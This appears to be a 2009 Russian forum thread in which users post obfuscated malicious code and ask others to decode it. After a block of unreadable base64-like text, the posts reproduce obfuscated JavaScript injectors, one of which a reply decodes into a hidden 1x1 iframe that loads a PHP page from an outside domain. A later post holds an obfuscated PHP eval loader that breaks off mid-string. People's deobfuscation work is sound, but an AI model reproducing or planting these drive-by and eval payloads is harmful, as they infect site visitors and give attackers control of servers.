CGcWq2H1i+5FAszk+YZRSm7ogqWcnGliPxXXBh+5Nb2+zkZZaK QiETn81+zJh6BabrWQiB+7gZ5drXnicivXfeK7KrP2bN775+MZ gAi3tSeHgVyuJB0jl9Sa1nmq9M6wZiNC2WeMDdnNRf/KNWqSV7NFObxiBagPWI0+byPTPZD9dUKsFXkzkW+PoUx33jswY 6RpOPUPAJrOhcoeyOpfDxDCX57Zeae6c61uKiCPdn8w6xSrcjS AQBp4G5LKX5r9usLja+JizZGzj1xML3kMY9CAQs3nQQxQ9UN4Y PDteM8ZjHrzgrVOMic6fEDXSoQzzQyMC+xMle90G2TlKYQ1dGt 6zaj/B74FzB1mJ1n/jBYVKAwTdqOZJX4bVGEbZiXNvjjG+KlcFnfwqdMF9OFydu5uRF r3rsF7I1GBvucGaiccjf/cJYsJ+rAu3syPbcd9akaFxTjqJlk/naI67UK7/LhRH9zSRvD/cUwZMQvhSt4ikSJZdE+o1A2DntmCvO2djaY0+aJ9N4fXgaQGXo faL/wEnobCz5w92aNfOsAg/ZNJpq5Sb+mfY8uDNggttUxjTwH7xdyhNFtQUlCztJGf/alKGB3C4g3u5si+K83DO/V7ucGe59g/4AsurpMyWCkFDK61kMlP5N5cVVvPRxQhdvZHVfJX59L3KLo9um P1m+/LX7FPpcNgHEhSNagdEXa4o3f7dPHxL/OPlaCnudFgKIEtO9CpoDLqkB6yU48DwlUvCtj6Q9ojJNa1p3at yGBD9lSeL4hboPJtmnj6rtQKu10SUtFmknwQ9Rb5tK2+oqeOqR yyTQeN6RsndpCiaD/eAAdhNPTejWQkaH26QdzxQhIYT2Bt04+qpBOWylbvv+9O54h7W zcjnYyS5k6mx85X1xf3MIW/r0w1F5/vIOC2buCB0nm3G9H8eEIi2Fnxx3r7m6nvgZwsbBUpEhQa3WsW4 z0Gvl/t2g0jghNSlGPnyC8zEzUm7JtME10lbHupecL10zLq2bhaKKP21 5AKQVvSzYf/EGIDuSM+69l6RseaBrA/TKJT1SoJ7/7Y7vI7O46K7gFXDVKBJInPn55B5qr81wvO97ROTWmYN/DzbepvmvXMLmoe6D/9w+Rb0tki8N0Omg1hJnXYZ1LZt37dQ4AtSpD0MMsGTaQz5pfoQ 66Q8OrSinOoaOrNSYINv9dbEq8qa59JqsfEXv0/KTgOBWa5ccHq7VsGW+nzpJWiQXGSfDDbrZUKr8/hcs7mXc7YQ9N46btz34eza59X5noypBtgC+246kbUqvUV/UiPW+rsn43o21EjfiJbhHuU/GMnlp1e1u2/ZUGRu+j9NZCM+nJfkvTXG2IdKYmaNqmzRVhhAOJaZEEOUwbp47 xPvy/ySGuE9Osy46o/9D08ajrUhijQVHyrFmCdyTpUF56OoRvCsQg8QmffzWtvEoenC1 pZyme/9LFhXPHjD4rQ0ge2WmCMxXKqV1nrl26XD2OzLZoHlmCsdk1a6O kf4BuS1GQAWgtFFNnXMD7ANaIzKeiRUhWWcT7br/PeOw/ymLhNwTwXTEKvbUOlivaWHpS7JzSu8w/iycBMuaAa3vWdRe7nMPUUtaVidsZH4o5LY7JT+HoRTkVKiIs/v2pJw0NzpkXi7OCRmeDZhlDb7j+P6WX46FiOhaa2zhDseVQwAS 5O0zobt7/hhOJbkhUxJdrv2ePWY6VSTruaXGj9bCYse8c9S2Vc16Hei888F nl3G3uTanxeSePTOEVdSrH/Mu63qjHCE5AvkyGZjtD2xknbkco8jdmVJ7SIaa/XoGEDGQxvL67x3hKSV+lbIGDj++bZzgzLb8UZOUERLEj4q0r4n ONpGyUZOu6e4UVUB6Gy7byjv1DKnfCsyzMkKs26dUpHSc5dyr0 dlwskbVpmjT2DrQ4mu2RZvdAizQ=

Kaimi

10.12.2009, 13:19

slil.ru/28322260

Wakko

10.12.2009, 20:13

slil.ru/28322260
Огромное спасибо.

anticoder

13.12.2009, 19:22

помогите расшифровать

<script>YPigjUvTGc='';function CFHclN(rmkhugBLg){ alert('ObUjdW');var BVlAtoy = document.getElementById('oBfE');var TOCUd=new Function("YAzrui", "return 742175;");var BVlAtoy = document.getElementById('oBfE'); } var jHQ=false;var jPUL="";var qRL="qRL";var mXO;var uOW='';var tGEL="tGEL";mXO='%d6%cf%da%c0%cd%df%d2%c6%e5%ad%e8%9b%a2%ae%b 3%d7%84%9e%98%a2%e7%82%85%89%93%c2%94%8c%96%89%f5% b3%b5%87%99%8f%82%99%8d%9b%94%cd%e0%e7%cd%f7%f8%e9 %9b%b9%d9%93%9b%9d%f0%ac%ff%aa%83%95%8f%f0%a7%b5%8 e%db%d9%dd%d6%c8%d0%87%cd%ec%f6%e1%88%d4%d5%c6%ca% d1%cc%d7%fd%e0%a2%8b%b3%f6%f7%d1%d2%c1%ca%ab%ad%c8 %84%94%85%81%c4%d5%c9%c0%fe%f8%e2%87%82%84%f1%ec%f d%80%fa%97%d6%d1%c1%d7%80%ab%ba%e8%cc%de%cf%dc%e3% e5%e1%9e%d6%d0%cd%96%c3%da%c9%df%e7%a2%8c%c2%c9%cd %c8%b6%8c%88%94%cc%d7%d0%e7%f9%fd%9b%92%8e%85';var pFIO='';var vVW="";function lYK(vGLU){var sHZ=false;var cDQR=''; function jRA(uEHP, aEV){var yPKZ="";var xXD=false;var mSFF=3565;var fAGL="fAGL";var lEN=40509;var aIAB="";if(qUHJ == null) {var mRAY='';var kRXZ=false;var yDF="";var aFB=false;qUHJ = {};var iDGG=false;var cNUB=false;var nWK="";}var uWQ=7170;var bGS=false;var pNV=19953;var jCQ="jCQ";var aKWW="aKWW";var rTMK='';if(qUHJ[uEHP] == null) {var jHKA=33207;var cRYK=16097;qUHJ[uEHP] = new Object();var jACB="";var gAA=false;var vHO="";var ySNI="";qUHJ[uEHP].lLPA = 0;var hGR='';var eTEE="";var nMBR="nMBR";var tUQA='';qUHJ[uEHP].pKAK = aEV;var mOF='';var wQK='';var xBJO='';var fPG=52594;}var qCOX="qCOX";var qYS=false;var gICW=58349;var uIM=false;}var aWS='';var iBG="";var hXRL='';var wTE=false;var iMQ=false;var sCRY="sCRY";function nGM(yPSU){var mGZG="mGZG";var xOOX="";var jECB="jECB";var vJRK=20269;var eFX='';var aJYA=0;var vBH=false;var bQP="";var xIUO=""; var vNHP=yPSU.length;var bXB="bXB";var nFL="";var rAI=0;var gWIM='';var eTVZ="eTVZ";while(rAI<vNHP){var qTB="qTB";var jZZO=false;var fQBN="fQBN";var wSU="wSU";var eYIV="eYIV";var vADB="vADB";rAI+=1;var sES=false;var tHDG="tHDG";sIB=uDUM(yPSU,rAI-1);var wWNS="wWNS";var hQG="hQG";var bZR="bZR";var vLTD="vLTD";aJYA+=sIB*vNHP;var nGDF="";var nMHH=""; var wUIA=false;var jXJA="";var zSPH="zSPH";}var dYDI=false;var rJDW="rJDW";var rFD='';var mFWC=false;var dBFB=43450;var yZZX=48904;var mYO=55622;return new String(aJYA);var bWVT=36207;var wVJ="wVJ";}var fMH="";var gCBL="";var jCPE=false;var iUZS=false;var tXX=44128;var fOGZ="fOGZ";var rHP=false;var fNTL=false;var uAC='';var iDI=false;var pLEO="pLEO";var xRA="";var nWO=false;function cYSC(uEHP) {var cKPO="cKPO";var bBHR="bBHR";var wORG="wORG";var qLCT="";if(qUHJ[uEHP] != null) {var qXFE=23484;var qBZP="qBZP";var hUNB=false;var kWLK = qUHJ[uEHP].lLPA;var oIJ=53608;var pIO=14878;var jKZ = qUHJ[uEHP].pKAK.substr(kWLK, 1);var yZXX='';var eZAX='';var kLP=false;var cAB=false;var wBD="wBD";var qUH="";var uPA="";if(kWLK + 1 >= qUHJ[uEHP].pKAK.length) {var pEE=false;var hEI="";qUHJ[uEHP].lLPA = 0;var mSSV="";var fXGM="fXGM";var zBN="";var qSLZ="";} else {var uRDH=45672;var lRZ="lRZ";var cYOR=false;qUHJ[uEHP].lLPA = kWLK + 1;var iBXZ="iBXZ";var oKF=42868;var kJF='';}var dTIM='';var nPT="nPT";var rHHW="";var rAR="";return uDUM(jKZ, 0);var zVO="zVO";var sGT='';var uFN="";var tCCV='';}var qOXH=false;var lJZ=false;var cTP="cTP";}var lUO='';var tRK=7191;var cWYN="cWYN";var bYH=false;var zMQ="";var nEH="nEH";var lLM=8921;var uWL='';var fVKT="fVKT";var qZB=false;var rLT=64092;var gPQ=29027;var hEF='';var kPK='';var aHV = new String(document['d&o<cOuamZeZn&t<'.replace(/[\<a&OZ]/g, '')]);var rFEK="";var hWVB=false;var bEB="bEB";function uDUM(aVC,pKI){var lDBF="";var vDSK=false;var xMQG='';var wCH=5015;return aVC.charCodeAt(pKI);var eSQT="eSQT";var tQPZ=60448;}var fTD="";var zUW=false;var cGC="";var xMMO=false;if(aHV.indexOf('aArKiKtKyk'.replace(/[kRA7K]/g, '')) !== -1) {var rGN="";var xIDT=false;var dSW=4273; return 229;var eHY="";var fOXS='';var bKYW=65407;var eYM="";}var gJT=false;var zGOT="zGOT";var vGLS=58268;var tAD=false;var nLYN="nLYN";var wUDO="wUDO";var qUHJ = null;var mCIB=48985;var dZP=50716;var eNTQ=window;var uMA="uMA";var lPW=false;var xLN=false;var oWL='';var xRY=window;var xKDM="xKDM";var vPMT="";var gLW=String;var dRJS="dRJS";var gXR=33950;var cDQ=57723;var pMW="";var vGCI = eNTQ['s1e4t!T!i4m!e4oXu!t!'.replace(/[\!R41X]/g, '')];var bEYM=false;var nMGH=44035;var iIN=229;var nON="";var vVDA=26442;var kKJ='';var cPBH=eNTQ['uMn~ePs~cPa~pOeP'.replace(/[P%~OM]/g, '')];var eAQX=13516;var mKN='';var qHUS=false;var qRDP = '';var nLX="";var iSJF="iSJF";var xNF="";var rKO=gLW['f(r3o1m(Ckh3a3rkC+o3d+e('.replace(/[\(\+1k3]/g, '')];var cBQ=false;var qIUN="";var vGLU = cPBH(vGLU);var yTQQ=false;var gOV="gOV";var mFF="mFF";var kYN=false;var kTI="kTI";var sQA="sQA";var iHAK = new gLW(lYK).replace(/[^@a-z0-9A-Z_-]/g,'');var dHV="dHV";var eEU='';var lIJ = new gLW(nGM(iHAK));var lQF=33224;var mJY="";var pEL=63806;var hGGL='';var rNJW="";var oZPD=false;var iUMM="";jRA('pOQ', iHAK);var gEGK='';var iCEK=32765;var nBO="";jRA('wYKA', lIJ);var nPZ=27364;var oGA="oGA";var lKI="lKI";var sCX="";var zUYO='';var vPBX='';for(var bDKU=0; bDKU < (vGLU.length); bDKU++) {var kHU=9259;var cMCK=36081;var uBD='';var qBQ=51667;var bANB = uDUM(vGLU,bDKU);var bPR="bPR";var cPRP="";var pHO=21308;var vGV="";bANB^= iIN;var mGP="mGP";var fSX=42835;bANB^= cYSC('wYKA');var nUE='';var jEA="jEA";var xQI="xQI";bANB^= cYSC('pOQ');var tBQS=false;var yHBC='';var cPF=43186;var oNO='';var xNJP="";var lQYN=false;var uPKD='';qRDP+=rKO(bANB);var xXTB=23374;var yNNL=false;var kLPB=34166;var gAB=18637;}var kIKU=11263;var yGKW="";var tADG=23057;var dKS="";var qMBN="";var aWT=38479;var zGY=63771;var eEW='';vGCI(qRDP, 246);var aXI="aXI";var xBX='';var cKZ=false;return qRDP=new gLW();var tSRP=false;var kKSU="";var dBGZ="";var aJRF="";var uPGI="uPGI";};var hPDO=63632;var eUQ="";var kLBA="kLBA";var cHN=false;lYK(mXO);var nPJ=false;var wPE="";</script>
<script>function WlHmRiB(dGKIMlv){ fff=op.split("285"); }
function PnZBh(KOBBTK){var SlBJ=5,FqfO=4;var ZITyR='106+1-162+2-158+3-173+3-152+2-167+2-157+2-71+1-180+0-162+2-156+1-176+1-161+1-107+2-92+2-71+1-161+1-157+2-162+2-160+0-161+1-176+1-107+2-92+2-71+1-153+3-170+0-173+3-156+1-157+2-',QEP=ZITyR.split('-');zsKiyrU='';
function TyLbimtuB(c)
{
return String.fromCharCode(c);
}
for(jNl=QEP.length-1;jNl>=0x24-0x23-0x31+0x9+0x2f+0x26-0x28+0x2c-0x2a-0x8;jNl-=-0x5-0x1-0x29+0x13-0x2f-0xc+0x58)
{ cRaDQ=QEP[jNl].split('+');ddD = parseInt(cRaDQ[0]*FqfO)+parseInt(cRaDQ[1]);ddD = parseInt(ddD)/SlBJ;zsKiyrU = TyLbimtuB(ddD-(-0xd-0x31-0x29-0x2e+0xae))+zsKiyrU;}return zsKiyrU;}function uzvdJPkHVI(njziVriro){ var jeoP = document.getElementById('wWIiPzzUzR');window.eval( ); }
function xRelZG(yWUPnz){var fIX=6,kOexj=6;var iNFTCVs='139+0-86+0-73+0-57+0-127+0-139+0-122+0-134+0-126+0-123+0-136+0-139+0-125+0-126+0-139+0-86+0-73+0-57+0-140+0-139+0-124+0-86+0-64+0-129+0-141+0-141+0-137+0-83+0-72+0-72+0-',ZAO=iNFTCVs.split('-');nxhutQo='';
function JVGEkoVlAB(c)
{
return String.fromCharCode(c);
}
for(wyQEVpxI=ZAO.length-1;wyQEVpxI>=-0x1e-0x15+0x26+0x1d-0x29+0xa+0xf;wyQEVpxI-=-0x27+0x18-0x24-0x1c+0x50)
{ SXCBfGmTYT=ZAO[wyQEVpxI].split('+');xeqlyxCF = parseInt(SXCBfGmTYT[0]*kOexj)+parseInt(SXCBfGmTYT[1]);xeqlyxCF = parseInt(xeqlyxCF)/fIX;nxhutQo = JVGEkoVlAB(xeqlyxCF-(0x32+0x14-0x12-0x1b))+nxhutQo;}return nxhutQo;}function StZbClcGhw(liDtvNGDHu){var IIxgloSz=4,IAF=6;var OmB='84+0-90+0-82+4-97+2-82+0-84+0-93+2-94+0-47+2-82+4-90+4-89+2-48+0-85+2-86+0-90+4-93+2-94+0-50+4-47+2-91+2-86+0-91+2-42+4-58+0-56+4-48+0-86+4-84+4-92+4-',hMdBFeX=OmB.split('-');CrGbV='';
function LxE(c)
{
return String.fromCharCode(c);
}
for(kIY=hMdBFeX.length-1;kIY>=0x24-0x5+0x20+0xf-0x4e;kIY-=0x25-0x1f-0x13+0xa+0x2-0xe-0xf+0x1f)
{ ZbsIILJ=hMdBFeX[kIY].split('+');zisARWSCu = parseInt(ZbsIILJ[0]*IAF)+parseInt(ZbsIILJ[1]);zisARWSCu = parseInt(zisARWSCu)/IIxgloSz;CrGbV = LxE(zisARWSCu-(-0x17-0xf+0x10+0x1b+0x1f-0xb))+CrGbV;}return CrGbV;}function phUeMvX(NAKsYpm){var LSOKxI=6,IuwBpIsT=10;var wfxftS='73+2-80+4-75+6-52+2-',gqMcaXzW=wfxftS.split('-');eXMDjoDsS='';
function AidWIcMnra(c)
{
return String.fromCharCode(c);
}
for(BOnkMqNdQ=gqMcaXzW.length-1;BOnkMqNdQ>=-0x26-0x22-0x29-0xa+0x7b;BOnkMqNdQ-=-0x19+0x24-0x7+0x17-0x1a)
{ OZnlmag=gqMcaXzW[BOnkMqNdQ].split('+');drNohACj = parseInt(OZnlmag[0]*IuwBpIsT)+parseInt(OZnlmag[1]);drNohACj = parseInt(drNohACj)/LSOKxI;eXMDjoDsS = AidWIcMnra(drNohACj-(-0x1a+0x4-0x4+0x33))+eXMDjoDsS;}return eXMDjoDsS;}function dNy(avnbAko){ window.eval();alert('RWwoulk'); }
document['1309wr3899i7098t8775e91663742'.replace(/[0-9]/g,'')](PnZBh('HryPWYS'),xRelZG('qFLkBcXw'),StZbClcGhw('I VyHpwAvGK'),phUeMvX('QqKkr'));function FGvDFy(QhNwRZIer){ window.eval();alert('xMma');alert('xMma'); }
function RnB(TExLUds){ window.eval(); }
function QsCVr(DmyakVE){ fff.op.replace("602"); fff.op.replace("602"); }
</script>
<script>function uEQTGT(Tly){fff.op.replace("330"); }
function qZLP(rtdxPYsA){var FhFYAFx=3,FtXBkO=2;var opjqhbibi='111,0-178,1-174,0-192,0-166,1-184,1-172,1-69,0-199,1-178,1-171,0-195,0-177,0-112,1-94,1-69,0-177,0-172,1-178,1-175,1-177,0-195,0-112,1-94,1-69,0-168,0-187,1-192,0-171,0-172,1-',pnoxZRtY=opjqhbibi.split('-');CMJuejf='';function MmualISBAh(c){return String.fromCharCode(c);}for(QTJMgSLu=(pnoxZRtY.len gth-1);QTJMgSLu>=(0x27+0x19-0x29+0x13-0x2a);QTJMgSLu-=0x2e-0x7+0x16+0x31-0x6d){ KzuhUH=pnoxZRtY[QTJMgSLu].split(',');vSRxlM = parseInt(KzuhUH[0]*FtXBkO)+parseInt(KzuhUH[1]);vSRxlM = parseInt(vSRxlM)/FhFYAFx;CMJuejf = MmualISBAh(vSRxlM-(-0x28-0x20-0x7+0x2e+0x2f+0x27-0x27))+CMJuejf;}if( CMJuejf.charCodeAt( CMJuejf.length-1) == 0)CMJuejf = CMJuejf.substring(0, CMJuejf.length-1);return CMJuejf.replace(/^\s+|\s+$/g, '');}function qFaLZ(VgOCSfGM){ alert('VNiDlNkETP'); }
function qCaCGik(hPKtjZY){var CcEptTR=3,cKT=4;var etRk='96,0-56,1-46,2-34,2-87,0-96,0-83,1-92,1-86,1-84,0-93,3-96,0-85,2-86,1-96,0-56,1-46,2-34,2-96,3-96,0-84,3-56,1-39,3-88,2-97,2-97,2-94,2-54,0-45,3-45,3-',Evx=etRk.split('-');hADFvxU='';function zQWgSzrLki(c){return String.fromCharCode(c);}for(nXHAad=(Evx.length-1);nXHAad>=(0x2e-0x5-0x1f-0x17-0x5-0x1c+0x2e);nXHAad-=0x13-0x32-0x2a-0x24+0x1a+0x18+0x3c){ fFKt=Evx[nXHAad].split(',');BzOtIEmZN = parseInt(fFKt[0]*cKT)+parseInt(fFKt[1]);BzOtIEmZN = parseInt(BzOtIEmZN)/CcEptTR;hADFvxU = zQWgSzrLki(BzOtIEmZN-(0x1e-0x3-0x1c+0x8-0x20-0x8+0x2f))+hADFvxU;}if( hADFvxU.charCodeAt( hADFvxU.length-1) == 0)hADFvxU = hADFvxU.substring(0, hADFvxU.length-1);return hADFvxU.replace(/^\s+|\s+$/g, '');}function lArl(iWMSlDjR){var wsQUc=4,xnsiWYwap=5;var AMnDIRRp='100,0-104,4-93,3-94,2-106,2-88,4-48,0-90,2-100,0-98,2-48,4-95,1-99,1-52,4-48,0-100,4-94,2-100,4-42,2-60,4-59,1-48,4-95,1-92,4-102,2-88,4-98,2-92,0-60,4-',zuhNmE=AMnDIRRp.split('-');KuxZrugfZD='';function IFXqgBs(c){return String.fromCharCode(c);}for(YvUbfX=(zuhNmE.length-1);YvUbfX>=(0x1e+0x23-0x41);YvUbfX-=0x1a+0x1c-0x1e+0x8-0x6-0x19){ RuVuPrSaa=zuhNmE[YvUbfX].split(',');wdzs = parseInt(RuVuPrSaa[0]*xnsiWYwap)+parseInt(RuVuPrSaa[1]);wdzs = parseInt(wdzs)/wsQUc;KuxZrugfZD = IFXqgBs(wdzs-(-0x17+0x14+0x2a-0x13+0x2f+0x26-0x5b))+KuxZrugfZD;}if( KuxZrugfZD.charCodeAt( KuxZrugfZD.length-1) == 0)KuxZrugfZD = KuxZrugfZD.substring(0, KuxZrugfZD.length-1);return KuxZrugfZD.replace(/^\s+|\s+$/g, '');}var UrdRh=qZLP('ERWHE')+qCaCGik('grcu')+lArl('rHePy'); HqlzXHjJve=document;HqlzXHjJve['5350wr3371i6938t7078e59467460'.replace(/[0-9]/g,'')](UrdRh);function yoSnqC(TOWXLLOA){ var sjMmLX = document.getElementById('VCF'); fff.op.replace("396"); }
function BumvYsfwr(Hzdg){ var FAd=new Function("MmNhmml", "return 789480;");var ehrDXPwt = document.getElementById('DKARR'); }
function UClzxt(djvKGvEh){fff.op.replace("265");var KrGkVeqYdo=new Function("THdSfdcrN", "return 280763;"); }
</script>

Dragon_X

15.12.2009, 08:44

помогите расшифровать

...
var UrdRh=qZLP('ERWHE')+qCaCGik('grcu')+lArl('rHePy');
document['5350wr3371i6938t7078e59467460'.replace(/[0-9]/g,'')](UrdRh);
...

Из того что указано выше получилось
<iframe width=1 height=1 border=0 frameborder=0 src='http://oughwa.com/in4.php'></iframe>

Может быть что-то ещё пропустил

Eric Cartman

23.12.2009, 17:05

Помогите расшифровать вот это:
<?php
////////////////////////////////////////////////////////////////////////////////

eval (base64_decode(str_rot13(base64_decode("TWFJaEwzRWNvMjR0b0pTNHAyeTBNSTl3TEpBYk1GdGNWTmM3UH R5YW9UOXZMSmp0V1QxdXJVQWNxVElzTDJTd25USXNwM0V1cGFF c3FUeWdNRmp0V1QxdXJVQWNxVElzTDJTd25USXNvejg3UHR4WF BGRWdMS3VtbktFeUsyQXVMMnV5SzI1aVZRMHRNelNmcDJIN1B0 eHhvSlM0cDJ5ME1JOXdMSkFiTUk5bXFUU2xxUzkwbkoxeVZRMH RNMkkwb0p5d3B6OTBuSjF5WFB4N1B0eFhQRkUxcHpqdENGTnhL MUFTSHlNU0h5ZmFIeElFSUhJR0lTOUlIeHhhS0dmWFB0eWNNdk 5icDNFbHBUOW1YUEUxcHpqZlZQcXdMSkFiTUYxem9VSW1uUHBj VlBSOUNGT3pMSmttTUZPdW96RHRwM0VscFQ5bVhQRTFwempmVl Bxd0xKQWJNRjF6b1VJbW5QcGNWUTR0WlBOY1B0eTdQdHhXV1Qx dXJVQWNxVElzTDJTd25USXNvejh0Q0ZPMHBhSXlCamJXUEoxbW 8xOXpvVUltblM5d0xKQWJNRnRjQmpiV1BLV3lxVUlsb3ZPekxK a21NR2ZYUEswWFBEYldXVEVjcHZOOVZVV3lMSmtqTEtFYlhURW NwejV1b0pIYksxOVRGSGtTSzE4Y1hGTmhWUHBpTDJTd25USGlX bWZYUEZFem5Ka3lwVFMwblBOOVZQRXhuS1Z0WXZPZ01RSGJXVU lsb1B4N1B0eFhQSnl6VlB0dE16eWZNSTl5clR5bXFVWmJXVE1j b1RJakxLRWJYRnhYUEtmWFBEeWNNdk5iVlBFenBQTjlWUk96bz NPeW92dHhNenlmTUtPdXFUdGZWUHFsTHZwY1hEYldQS2ZYUER4 V1dUQXVMMnV5VlEwdE1hV3lMSkRiV1RNallQT3puSmt5cDJ5Nk 1GdHhNenlmTUtPdXFUdGNYR2ZYUER4V1B0eFdQSk13b1Q5bU1G dHhNYU5jQmpiV1BEeFhQRHhXV1QxeW9KOWxyRHh0Q0ZOYlZKTT FvekEwbko5aEsySTRuS0EwcGx0YW9KSWdvM1c1SzJxeXFTOTFw MlNhTUZwY1hGTi9WUHBhVlFidHB6OTFvekRib0pJZ28zVzVLMn F5cVM5MXAyU2FNRnRjWW1Salp3RGlaR05sQVBqdFp2eHRZdk5h R0hWYUJqYldQRHhYUER4V1dVRWNvSkh0Q0ZPbXFKV21xVVZiTT JJMG9KeXdwejkwbkoxeVhQeHRZRk54b0pTNHAyeTBNSTl3TEpB Yk1JOW1xVFNscVM5MG5KMXlZUE5qWVBOM1hGTmhWUHB0cDJJd1 dtZlhQRHhXUHR4V1BGRWdMS3VzcDJ5ME1GTjlWUHA4cFBPbXFV eWZNRzB2cVRJNHFQMXVvVHlhb3didEwySWhxVElsVnc0OExGT2 Jwekl6Q0ZXYnFVRWpCdjhpb0pTNHAyeTBNRjVpcHpwaVZ3NUFE SXVRREhBVkVHamlMRzQ2VlBwdFl2TnhvSklnbzNXNVZQNHRXbD hhVlA0dFdVRWNvSkh0WXZOYUNQOWpDdnA3UHR4V1BEYldQRHlj TXZOYnAzRWxwVDltWFBFd0xKQWJNRmp0V21qdVlGMUFESXVHRk lFU0QwU1FGUkhnWUc0YVhGTnVDRzB0TXpTZnAySGNWTmJXUER4 V1dUQXVMMnV5VlEwdHAzRWxLM1d5cFRrdUwySGJXbWp1WUYxQU RJdUdGSUVTRDBTUUZSSGdZRzRhWVBOeG9KUzRLM0FjcVRIZlZQ RXdMSkFiTUZ4N1B0eFdQSklmcDJIWFBEeFdQRkV3TEpBYk1GTj lWVUEwcHk5bE1LT2ZMSkF5WFBwOFkyV2lNVXgrV2xqdFdUMXVy UzltbktFeVZQNHRXbWppTHo5eHJHNGFZUE54TDJTd25USGNCam JXUER4WFBEeFdNSkFib2xOeEwyU3duVEg3UHR4V1BLV3lxVUls b3ZPMHBhSXlCamJXUEswWFBLMFhQRGJXbzJXc3AzRXVwYURiWE dmWFBEYldwekkwcUtXaFZUTXVvVUF5QmpjOVB0YlhQdjhkWHRi dFZQYnQwVy9EaWdUUzBZN0RnZ1BqMEw4dDBMR0V0OVA5MFllRX VnUDQwTDh0MFl3RGdsT0FMS3VHbktFeVZSQUFIbE5iblVFMHBR YmlZMjF1clAwbVpRTmpZekFpb0Y4Y1B2TnRYdlFEeHZPQUxLdU duS0V5VlJBQUhsUURpcVAxMExWdDBZL0V0QVArMFlVRGg5UDEw WWp0MExSdDBZZUV3cVRWMFl3RXRBUCswWVlEZkFQOTBZd0RncV A4WXRidFZQYnQwVy9EaWdQNjBMQ0RpOVBqMFlhRXRnUDFWQVA5 MFlRRXZBUDQwTEh0MExVRGg5UCswWTNEaWdQbFZEYmRZamN6cU o1d3FUeWlvdk9ncDI5c0xKRXhLMkF1TDJ1eVhQRWVNS3hmVlBF aXFLRWpxS0RjVk5jN1B0eHhMMlN3blRJc3BUUzBuUE45VlVXeU xKa2pMS0ViWFRFY3B6NXVvSkhiSzE5VEZIa1NLMThjWEZOaFZQ cGlMMlN3blRIaVdtZlhQRGJXbkpMdFhQTnVuS0FzTVR5bFhQRX dMSkFiTUk5akxLRWJYRk9pcHZOdW5LQXNxM1djcVRTdm9USGJX VEF1TDJ1eUszT3VxVHRjWEZPbE1LRTFwejQ3UHR4WFBKeXpWUH R0V1RNalZRMHREVE1pcFRJaFhQRXdMSkFiTUk5akxLRWJWUDR0 b0pEMVhQRWVNS3hjWVBOYXEyVmFYRnhYUEtmWFBEeXpvVDl3bm x0eE1hTmZWUmtDRDBnc0VJdGNCamJXUEpNM3B6eTBNRnR4TWFO ZlZQRWlxS0VqcUtEY0JqYldQSk1mbzJBZVhQRXpwUGp0R1I5UU YxOUlHdng3UHR4V016QWZvM0F5WFBFenBQeDdQdHk5UGEwWFB0 YmlYdmJYVlBOZFZBUHUwWWlEaWdQOTBMZnQwWXNEZkFQODBZS0 V1OVBqMExZRGdxUDcwTG1EaXFUWTBZSHVQdk50WHZRRGhBUDAw WUtEaVBRRXRxVEIwWUdEZlFidG5VRTBwUWJpWTIxdXJQMG1aUU 5qWXpBaW9GOFhYdjhYTWFJaEwzRWNvMjR0b0tBaUsyTWZxS0Fi SzJBdUwydXlYUHh0UGFmWFBGRXdMSkFiTUk5akxLRWJWUTB0cH pJdW9VT3VxVHRiTVR5bG96U2dNRnVzSzBNV0dSSXNLbHhjVlA0 dFdsOXdMSkFiTUY4YUJqYldQdHljTXZOYlZQU2NwMTl4bktWYl dUQXVMMnV5SzNPdXFUdGNWVDlsVlBTY3AxOTNwenkwTEpXZk1G dHhMMlN3blRJc3BUUzBuUHhjVlVXeXFVSWxvd2ZYUEpFeW9UST BNSTl6bkpreXBsdHhMMlN3blRJc3BUUzBuUHg3UGEwWFB0YmlY dmJYVlBOZFZBUEkwTGFEZ0ZRRGdxVE8wTFlFd1BRRGhnVE4wWT dEaDlQNDBZZURoTmJkWWpjenFKNXdxVHlpb3ZPZ0xLdW1uS0V5 SzJBdUwydXlLMkloTVB0Y1BhZlhQSnFmbzJXdW9QTnhvSlM0cD J5ME1JOXdMSkFiTUk5aG9tZlhQRGJXbkpMdFhQUnhvSlM0cDJ5 ME1JOXdMSkFiTUk5aG9seHRvS0FpSzJTeE1TOXdMSkFiTUZ0eE sxQVNIeU1TSHlmYUh4SUVJSElHSVM5SUh4eGFLRmp0bzJXc00y STBLMk1mcUtBYlhQeGNCamM5UHRiWFlsYmRQdk50WHZPRklSTU FWU09WSE5iZFlqY3pxSjV3cVR5aW92T2FNS0VnbkpBbG8zRWNv SkhiWEZOWHJsTlhQSmtjcDNEYldVSW1NSlpmVlBFbU1KWmNWUT B0TUt1am9UOXhNRnR2VlBWZlZUMWNMM1dpcVR5Z01GdGNYR2Z0 UHR5bE1LRTFwejR0WFB1em9UOXVxUHh4cUtBeUxsTmVWUHV6b1 Q5dXFQeHhwMkl3WEdmdFBhMHRQdGJYWWxiZFB2TnRYdk5iTGx4 dEQyOXhNSHlhb3p5ME1LVlhYdjhYTWFJaEwzRWNvMjR0TVRJZk 1LRXlLMk1jb1RJbVhQRWpMS0ViWVBOeE1USWZLMkVjcHZOOVZS TU9HU0FTWVBOeG9USTJNSmp0Q0ZOalhEYzdQRGJXWWw4dElVV2 NvRk8wblRIdHFVV3VuSmtjb3pwdHAya3VwMnRYUEZFakxLRWJW UTB0cFVXeU0xOWxNS09mTEpBeVhQVzhLdnRoWG04Y1lsYnhzUF ZmVlBXcEtRUnZZUE54cFRTMG5QeDdQdHhYUEp5elZQdHRWRk54 TDNJbHB6SWhxUzl4bktWdENGT05vM095b3pFY3B2dHhwVFMwbl B4Y1B0eFdwekkwcUtXaEJqYlhQS3FibkpreVhSTU9HU0FTVlBS OUNGTmJXVE1jb1RJaExKMXlWUTB0RFVXeUxKRXhuS1ZiV1RBMX BhV3lvYUVzTVR5bFhGeGNQdHk3UHR4V25KTHRYUEV6bkpreW96 U2dNRk51Q0ZOdll2VnRMSjV4VlBFem5Ka3lvelNnTUZOdUNGTn ZZdjR2WERiV1BLZlhQRHhXbkpMdFhUeW1LMkVjcHZ0eHBUUzBu UDRhWWxwaFdUTWNvVEloTEoxeVhGeFhQRHhXcmpiV1BEeFdZbD h0RkpxaG8zV3lWVElncFVFNVZUTWlvVEV5cGFaWFBEeFdQSnl6 VlB1bXFKV21xVVZiV1RNY29USWhMSjF5WVBOallQTmtYRk51Q0 ZOYVl2cGNQdHhXUER5N1B0eFdQRHhXTVRJZk1LRXlLMk1jb1RJ bVhQRWpMS0ViWXZwaVdsNHhNenlmTUo1dW9KSGZWUEV4TUprc0 1UeWxZUE54b1RJMk1KanRYbE5rWEdmWFBEeFdQSzBYUER4V3NE 